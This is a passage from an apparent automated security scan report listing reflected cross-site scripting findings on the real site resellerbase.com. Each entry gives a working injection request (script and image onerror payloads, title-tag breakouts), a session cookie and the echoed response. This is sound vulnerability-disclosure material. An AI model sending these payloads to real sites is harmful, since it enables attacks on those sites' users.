Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: eBook
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : eBook5a978<img src=a onerror=alert(1)>3a5fd0d9b1b]</td>
...[SNIP]...

2.4264. http://www.resellerbase.com/tag/eBook [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/eBook

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload fdab6</title><img%20src%3da%20onerror%3dalert(1)>2f72a943d3d was submitted in the REST URL parameter 2. This input was echoed as fdab6</title><img src=a onerror=alert(1)>2f72a943d3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/eBookfdab6</title><img%20src%3da%20onerror%3dalert(1)>2f72a943d3d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: eBookfdab6</title><img src=a onerror=alert(1)>2f72a943d3d</title>
...[SNIP]...

2.4265. http://www.resellerbase.com/tag/email+fax [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/email+fax

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fae1b<script>alert(1)</script>d1b3650c29a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagfae1b<script>alert(1)</script>d1b3650c29a/email+fax HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagfae1b<script>alert(1)</script>d1b3650c29a/email+fax was not found on this server.</p>
...[SNIP]...

2.4266. http://www.resellerbase.com/tag/flights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e1214<script>alert(1)</script>67df1e2891b4ab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tage1214<script>alert(1)</script>67df1e2891b4ab34/flights?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tage1214<script>alert(1)</script>67df1e2891b4ab34/flights?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4267. http://www.resellerbase.com/tag/flights [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b6d7<script>alert(1)</script>2f6e6dc69b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3b6d7<script>alert(1)</script>2f6e6dc69b8/flights HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3b6d7<script>alert(1)</script>2f6e6dc69b8/flights was not found on this server.</p>
...[SNIP]...

2.4268. http://www.resellerbase.com/tag/flights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21ee5<img%20src%3da%20onerror%3dalert(1)>7b2e78f7882447664 was submitted in the REST URL parameter 2. This input was echoed as 21ee5<img src=a onerror=alert(1)>7b2e78f7882447664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/flights21ee5<img%20src%3da%20onerror%3dalert(1)>7b2e78f7882447664?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: fligh
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : flights21ee5<img src=a onerror=alert(1)>7b2e78f7882447664]</td>
...[SNIP]...

2.4269. http://www.resellerbase.com/tag/flights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c40c7<img%20src%3da%20onerror%3dalert(1)>62fa1b45868 was submitted in the REST URL parameter 2. This input was echoed as c40c7<img src=a onerror=alert(1)>62fa1b45868 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/flightsc40c7<img%20src%3da%20onerror%3dalert(1)>62fa1b45868 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: fligh
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : flightsc40c7<img src=a onerror=alert(1)>62fa1b45868]</td>
...[SNIP]...

2.4270. http://www.resellerbase.com/tag/flights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2e057</title><img%20src%3da%20onerror%3dalert(1)>202e60fe594 was submitted in the REST URL parameter 2. This input was echoed as 2e057</title><img src=a onerror=alert(1)>202e60fe594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/flights2e057</title><img%20src%3da%20onerror%3dalert(1)>202e60fe594 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: flights2e057</title><img src=a onerror=alert(1)>202e60fe594</title>
...[SNIP]...

2.4271. http://www.resellerbase.com/tag/flights [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/flights

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload ed663</title><img%20src%3da%20onerror%3dalert(1)>4ddfc79c1fe4e5039 was submitted in the REST URL parameter 2. This input was echoed as ed663</title><img src=a onerror=alert(1)>4ddfc79c1fe4e5039 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/flightsed663</title><img%20src%3da%20onerror%3dalert(1)>4ddfc79c1fe4e5039?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/flights
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: flightsed663</title><img src=a onerror=alert(1)>4ddfc79c1fe4e5039</title>
...[SNIP]...

2.4272. http://www.resellerbase.com/tag/german [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/german

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload cec79<script>alert(1)</script>ab226175feb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagcec79<script>alert(1)</script>ab226175feb/german HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:55:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagcec79<script>alert(1)</script>ab226175feb/german was not found on this server.</p>
...[SNIP]...

2.4273. http://www.resellerbase.com/tag/german [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/german

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b808e</title><img%20src%3da%20onerror%3dalert(1)>ce3c292bf0b was submitted in the REST URL parameter 2. This input was echoed as b808e</title><img src=a onerror=alert(1)>ce3c292bf0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/germanb808e</title><img%20src%3da%20onerror%3dalert(1)>ce3c292bf0b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: germanb808e</title><img src=a onerror=alert(1)>ce3c292bf0b</title>
...[SNIP]...

2.4274. http://www.resellerbase.com/tag/german [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/german

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9d288<img%20src%3da%20onerror%3dalert(1)>d4e99a3ab56 was submitted in the REST URL parameter 2. This input was echoed as 9d288<img src=a onerror=alert(1)>d4e99a3ab56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/german9d288<img%20src%3da%20onerror%3dalert(1)>d4e99a3ab56 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: germa
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : german9d288<img src=a onerror=alert(1)>d4e99a3ab56]</td>
...[SNIP]...

2.4275. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 43de0<script>alert(1)</script>65dc54f074 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag43de0<script>alert(1)</script>65dc54f074/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag43de0<script>alert(1)</script>65dc54f074/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4276. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fe9a7<script>alert(1)</script>e851b81a620274380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagfe9a7<script>alert(1)</script>e851b81a620274380/googlepr.php?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagfe9a7<script>alert(1)</script>e851b81a620274380/googlepr.php?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4277. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72b26<img%20src%3da%20onerror%3dalert(1)>d591d172de3 was submitted in the REST URL parameter 2. This input was echoed as 72b26<img src=a onerror=alert(1)>d591d172de3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.php72b26<img%20src%3da%20onerror%3dalert(1)>d591d172de3 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php72b26<img src=a onerror=alert(1)>d591d172de3]</td>
...[SNIP]...

2.4278. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42ee1<img%20src%3da%20onerror%3dalert(1)>55963d360105fb2a8 was submitted in the REST URL parameter 2. This input was echoed as 42ee1<img src=a onerror=alert(1)>55963d360105fb2a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php42ee1<img%20src%3da%20onerror%3dalert(1)>55963d360105fb2a8?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googl
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : googlepr.php42ee1<img src=a onerror=alert(1)>55963d360105fb2a8]</td>
...[SNIP]...

2.4279. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 9a823</title><img%20src%3da%20onerror%3dalert(1)>3edf543b73565ff68 was submitted in the REST URL parameter 2. This input was echoed as 9a823</title><img src=a onerror=alert(1)>3edf543b73565ff68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/googlepr.php9a823</title><img%20src%3da%20onerror%3dalert(1)>3edf543b73565ff68?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/googlepr.php
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.php9a823</title><img src=a onerror=alert(1)>3edf543b73565ff68</title>
...[SNIP]...

2.4280. http://www.resellerbase.com/tag/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload eef3e</title><img%20src%3da%20onerror%3dalert(1)>5d62d5e64b4 was submitted in the REST URL parameter 2. This input was echoed as eef3e</title><img src=a onerror=alert(1)>5d62d5e64b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/googlepr.phpeef3e</title><img%20src%3da%20onerror%3dalert(1)>5d62d5e64b4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: googlepr.phpeef3e</title><img src=a onerror=alert(1)>5d62d5e64b4</title>
...[SNIP]...

2.4281. http://www.resellerbase.com/tag/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b306<img%20src%3da%20onerror%3dalert(1)>a0301be902b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b306<img src=a onerror=alert(1)>a0301be902b in the application's response.

